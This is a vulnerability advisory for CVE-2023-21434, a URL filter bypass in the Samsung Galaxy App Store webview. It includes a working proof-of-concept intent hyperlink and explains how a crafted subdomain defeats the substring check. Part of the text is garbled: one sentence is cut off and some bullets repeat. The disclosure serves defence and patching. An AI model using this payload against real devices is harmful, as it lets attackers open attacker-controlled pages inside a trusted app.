CVE-2023-21434 Details
Original post: https://research.nccgroup.com/2023/01/20/technical-advisory-multiple-vulnerabilities-in-the-galaxy-app-store-cve-2023-21433-cve-2023-21434/
| Product | Galaxy Store 4.5.48.3, other versions affected |
| Severity | Moderate |
| CVE Reference | CVE-2023-21434 |
| Type | URL Filter Bypass |
Summary
It was found that a webview within the Galaxy App Store contained a filter which limited which domains that webview could browse to. However, the filter was not properly configured, which would allow the webview to browse to an attacker controlled domain.
Impact
Either tapping a malicious hyperlink in Google Chrome or a pre-installed rogue application on a Samsung device can bypass Samsung’s URL filter and launch a webview to an attacker controlled domain.
Proof of Concept (PoC)
While using the Chrome web browser on a Samsung device, the following hyperlink can be tapped to exploit this issue:
<h1>
<a id="yayidyay" rel="noreferrer" href="intent://cloudgame/monitor?monitoringHost=<host>#Intent;action=android.intent.action.VIEW;package=com.sec.android.app.samsungapps;scheme=normalbetasamsungapps;S.android%2eintent%2eextra%2eREFERRER_NAME=http://com.sec.android.app.samsungapps;end">
YAYPOCYAY</a>
</h1>
In the above PoC, “
Technical Walkthrough
After launching the above PoC, the class com.sec.android.app.samsungapps.deeplink.CloudGameDeepLink is loaded, and the method e(context) is executed. This method determines if the Cloud Game deeplink should be executed, and the requirements to return “True” are:
- The “sender” of the intent must be “com.sec.android.app.samsungapps”
- This can be achieved by adding the string intent extra
android.intent.extra.REFERRER_NAMEin a browsable intent, and launched from the Google Chrome browser - Using the Samsung Browser will not meet this requirement due to how the browser handles browsable intents
- This can be achieved by adding the string intent extra
- The “monitoringHost” parameter must contain the string “player.glb.samsung-gamelauncher.com”
private boolean e(Context context) {
if (context.getPackageName().equals(getSender())) {
return this.L.getMonitoringHost().contains("player.glb.samsung-gamelauncher.com");
}
Loger.w(String.format("[%s] Unauthorized access from %s", M, getSender()));
return false;
}
An attacker can register an arbitrary domain and add “player.glb.samsung-gamelauncher.com” as a subdomain. For example, the domain “player.glb.samsung-gamelauncher.com.nccgroup.com” would force the method e(context) to return “True”
Recommendation
Samsung has released an updated version of the Galaxy App Store (version 4.5.49.8). Users should open the Galaxy App Store on their phone, and if prompted, download and install the latest version.
Timeline
| Date | Summary |
| 03/12/2022 | Samsung notified of vulnerability |
| 03/12/2022 | Samsung acknowledge receipt of report and a security analyst was assigned to analyze the report |
| 18/12/2022 | Samsung confirmed the vulnerability and rated it as a Moderate risk |
| 01/01/2023 | Samsung has released Galaxy App Store version 4.5.49.8 and has publicly disclosed the issue |